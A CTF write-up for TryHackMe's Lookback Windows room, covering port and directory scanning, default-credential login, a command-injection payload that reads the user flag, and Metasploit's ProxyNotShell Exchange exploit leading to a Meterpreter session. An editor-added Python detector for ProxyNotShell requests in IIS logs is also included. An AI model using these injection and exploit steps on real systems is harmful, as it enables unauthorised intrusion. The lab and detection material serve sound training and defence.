Lookback | TryHackMe Writeups

    

LOOKBACK

You’ve been asked to run a vulnerability test on a production environment. 

Challenge Link: LOOKBACK 

 

The Lookback company has just started the integration with Active Directory. Due to the coming deadline, the system integrator had to rush the deployment of the environment. Can you spot any vulnerabilities?

Start the Virtual Machine by pressing the Start Machine button at the top of this task. You may access the VM using the AttackBox or your VPN connection. This machine does not respond to ping (ICMP).

Can you find all the flags?
The VM takes about 5 minutes to fully boot up.

Sometimes to move forward, we have to go backward.
So if you get stuck, try to look back!
 
 
The TryHackMe LOOKBACK room is a recently created CTF-style challenge: a Windows machine that we have to crack through, which exposes the RDP protocol.
 

First Flag:

Enumeration:

As usual, the first step is a port scan with nmap or rustscan:

nmap -sS -sV 10.10.26.175
 
 
 
The scan shows that the machine has three running services, on ports 80, 443 and 3389. The service on port 443 hosts an Outlook web interface.

 
 
A targeted scan of port 3389 gives us more information about the RDP service:

Using Gobuster, with the command:

gobuster dir -k -u https://10.10.26.175 -w /usr/share/wordlists/dirb/big.txt --exclude-length 0
 

Going through all the directories, I found the "/test" directory with restricted access, asking for a user name and password.


Playing around with the Nikto tool gives us the default user credentials. Using those credentials, I can access the restricted page.

Voila, I got the first flag of the challenge.

Second flag:

Payload Injection:

 

After logging in, I got this Log Analyzer window, which gives a way to poke around the machine and inject commands.

After trying all the possible injections, I finally found the right payload to list the directories.
 
 
 
Wandering through the files, I finally found the user flag.

PAYLOAD: BitlockerActiveMonitoringLogs') ; type c:\Users\dev\Desktop\user.txt #('
 
 

 
 

Final Flag:

Going through the TODO.txt file:
List generated at 3:00:53 PM.
Hey dev team,

This is the tasks list for the deadline:

Promote Server to Domain Controller [DONE]
Setup Microsoft Exchange [DONE]
Setup IIS [DONE]
Use the latest update [KB OCT 2022 is missing need reboot]
Remove the log analyzer[TO BE DONE]
Add all the users from the infra department [TO BE DONE]
Setup LAPS [TO BE DONE]


When you are done with the tasks please send an email to:

joe@thm.local
carol@thm.local
and do not forget to put in CC the infra team!
dev-infrastracture-team@thm.local
 
I found that the Microsoft Exchange server is outdated, and found an exploit for it: "ProxyNotShell RCE".

Microsoft Exchange ProxyNotShell RCE:

This module chains two vulnerabilities in Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange PowerShell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only supports Exchange Server 2019. These vulnerabilities were patched in November 2022.
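A detection check added by the editor, not part of the original writeup or the Metasploit module: the request shape Microsoft published in its IIS URL Rewrite mitigation for CVE-2022-41040 (a request to autodiscover.json whose query carries an '@' followed by a path to the PowerShell backend) can be searched for in the Exchange server's IIS logs. The log lines below are constructed, and the layout is assumed to be the standard IIS W3C format with a '#Fields:' header.

```python
import re
from typing import Dict, List

# Request shape from Microsoft's published IIS URL Rewrite mitigation for
# CVE-2022-41040: autodiscover.json, an '@' in the query, then a path to the
# PowerShell backend. Case-insensitive, as the original rule was.
PROXYNOTSHELL_RE = re.compile(r"autodiscover\.json.*@.*powershell", re.IGNORECASE)

# Constructed sample in IIS W3C format (not real traffic); the '#Fields:' header
# defines the column order, as it does in real IIS logs.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-10-01 09:12:01 10.0.0.5 GET /owa/ - 443 - 10.0.0.20 Mozilla/5.0 200
2022-10-01 09:12:07 10.0.0.5 POST /autodiscover/autodiscover.json @attacker.invalid/powershell/ 443 joe@thm.local 10.0.0.99 python-requests/2.28 200
2022-10-01 09:12:09 10.0.0.5 POST /autodiscover/autodiscover.json @attacker.invalid/PowerShell/ 443 - 10.0.0.99 python-requests/2.28 401
2022-10-01 09:13:00 10.0.0.5 GET /ecp/ - 443 carol@thm.local 10.0.0.21 Mozilla/5.0 200
"""


def find_proxynotshell_hits(log_text: str) -> List[Dict[str, object]]:
    """Return one record per request whose URI matches the ProxyNotShell shape."""
    fields: List[str] = []
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(" ")[1:]  # header row defines the columns
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split(" ")))
        uri = f"{rec.get('cs-uri-stem', '')}?{rec.get('cs-uri-query', '')}"
        if not PROXYNOTSHELL_RE.search(uri):
            continue
        hits.append({
            "time": f"{rec.get('date')} {rec.get('time')}",
            "client": rec.get("c-ip", "?"),
            "user": rec.get("cs-username", "-"),
            "status": rec.get("sc-status", "?"),
            "uri": uri,
            # A 200 means the request reached the backend; a 4xx is a rejected
            # attempt, still worth triaging for the source address.
            "likely_success": rec.get("sc-status") == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in find_proxynotshell_hits(SAMPLE_IIS_LOG):
        print(hit)
```

The same function can be pointed at a real log directory by reading each file's text in turn; the authenticated 200 hits are the ones to escalate first, since the chain needs valid credentials to reach the backend.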


Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/windows/http/exchange_proxynotshell_rce
msf exploit(exchange_proxynotshell_rce) > show targets
    ...targets...
msf exploit(exchange_proxynotshell_rce) > set TARGET < target-id >
msf exploit(exchange_proxynotshell_rce) > show options
    ...show and set options...
msf exploit(exchange_proxynotshell_rce) > exploit
 
 
Filling in the module's required options, I used the email IDs provided in the TODO.txt file. Running the exploit got me a Meterpreter session:

 
 
Roaming around the directories, I got the root flag.

 
Thank you for reading the write-up. Have a good day...
 
